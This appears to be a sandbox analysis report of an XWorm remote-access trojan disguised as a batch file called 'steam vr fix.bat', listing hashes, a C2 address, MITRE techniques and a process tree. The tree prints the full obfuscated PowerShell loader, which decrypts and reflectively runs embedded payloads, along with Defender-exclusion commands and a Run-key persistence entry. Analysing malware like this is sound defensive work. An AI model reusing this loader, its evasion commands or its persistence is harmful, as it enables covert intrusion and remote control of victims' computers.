xworm | 7d1b357de1bf780a0958cbaccdea596d5a35b9562aacf3285c36725b053d7f15

Analysis

max time kernel
222s
max time network
224s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
12/10/2024, 23:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

steam vr fix.bat
Size

288KB
MD5

cef5aa25d01d9b931799245be48fbf2e
SHA1

879bf2dcf51bd29012215118e356208b6f312fb5
SHA256

7d1b357de1bf780a0958cbaccdea596d5a35b9562aacf3285c36725b053d7f15
SHA512

9d677126d28ec50d9686a6fda397004f267e4666a417d89cf7969929a8c0b083b6104075aab5947174e4c4202f28e1d168baa67a64133c9092d912b95152d293
SSDEEP

6144:ORr8O2eA/ce/3Tr6ZgjnPv+XgrDyHsUpeIKnIwwlt3TWAzdwL:OloDcM3v6Zgj+XgyH/gIKn3wltjWAhwL

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

147.185.221.16:60447

Attributes

Install_directory
%AppData%
install_file
System User.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/4760-15-0x00000214F3C10000-0x00000214F3C26000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 5 IoCs

flow	pid	Process
22	4760	powershell.exe
34	4760	powershell.exe
81	4760	powershell.exe
83	4760	powershell.exe
84	4760	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4760	powershell.exe
4036	powershell.exe
4608	powershell.exe
5100	powershell.exe
4232	powershell.exe

Downloads MZ/PE file

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
79	raw.githubusercontent.com
80	raw.githubusercontent.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133732485839616850"	chrome.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\.vir	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\vir_auto_file\shell\Read	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\vir_auto_file\shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\vir_auto_file\shell\Read\command	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\vir_auto_file	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\.vir\ = "vir_auto_file"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\vir_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\""	OpenWith.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1537126222-899333903-2037027349-1000\{3DAF0FF5-0068-4B71-A04D-589A735D2B7F}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Monoxidex64.exe.vir:Zone.Identifier	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4760	powershell.exe
4760	powershell.exe
4036	powershell.exe
4036	powershell.exe
924	chrome.exe
924	chrome.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
5100	powershell.exe
5100	powershell.exe
4232	powershell.exe
4232	powershell.exe
4232	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3680	OpenWith.exe
4760	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs

pid	Process
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
924	chrome.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
1888	msedge.exe
1888	msedge.exe
924	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	4232	powershell.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe
Token: SeShutdownPrivilege	924	chrome.exe
Token: SeCreatePagefilePrivilege	924	chrome.exe

Suspicious use of FindShellTrayWindow 58 IoCs

pid	Process
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
924	chrome.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe

Suspicious use of SetWindowsHookEx 26 IoCs

pid	Process
4760	powershell.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
3680	OpenWith.exe
4728	AcroRd32.exe
4728	AcroRd32.exe
4728	AcroRd32.exe
4728	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4164 wrote to memory of 4760	4164	cmd.exe	79
PID 4164 wrote to memory of 4760	4164	cmd.exe	79
PID 924 wrote to memory of 1412	924	chrome.exe	83
PID 924 wrote to memory of 1412	924	chrome.exe	83
PID 4760 wrote to memory of 4036	4760	powershell.exe	84
PID 4760 wrote to memory of 4036	4760	powershell.exe	84
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 860	924	chrome.exe	86
PID 924 wrote to memory of 3440	924	chrome.exe	87
PID 924 wrote to memory of 3440	924	chrome.exe	87
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88
PID 924 wrote to memory of 2764	924	chrome.exe	88

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\steam vr fix.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vKDwqPSccRZWtaykdyLwPrnu/oo+RR5tUN+CTktQAyk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VCkjVou+3A3nJtV8BnQ8iA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nbHZh=New-Object System.IO.MemoryStream(,$param_var); $uaspb=New-Object System.IO.MemoryStream; $UhaLC=New-Object System.IO.Compression.GZipStream($nbHZh, [IO.Compression.CompressionMode]::Decompress); $UhaLC.CopyTo($uaspb); $UhaLC.Dispose(); $nbHZh.Dispose(); $uaspb.Dispose(); $uaspb.ToArray();}function execute_function($param_var,$param2_var){ $nIVay=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JEuEi=$nIVay.EntryPoint; $JEuEi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\steam vr fix.bat';$BegTS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\steam vr fix.bat').Split([Environment]::NewLine);foreach ($HAEPd in $BegTS) { if ($HAEPd.StartsWith(':: ')) { $HOqZC=$HAEPd.Substring(3); break; }}$payloads_var=[string[]]$HOqZC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://doxbin.org/
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1888
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc494d3cb8,0x7ffc494d3cc8,0x7ffc494d3cd8
      4⤵
      PID:4276
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
      4⤵
      PID:3580
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
      4⤵
      PID:728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
      4⤵
      PID:5100
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
      4⤵
      PID:4808
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
      4⤵
      PID:4640
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
      4⤵
      PID:4816
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3512 /prefetch:8
      4⤵
      PID:5220
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3480 /prefetch:8
      4⤵
      Modifies registry class
      PID:5228
  - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3912 /prefetch:8
      4⤵
      PID:5392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4008 /prefetch:8
      4⤵
      PID:5932
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
      4⤵
      PID:4516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
      4⤵
      PID:3728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,4138579787064242596,16683074837060304984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
      4⤵
      PID:5652
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
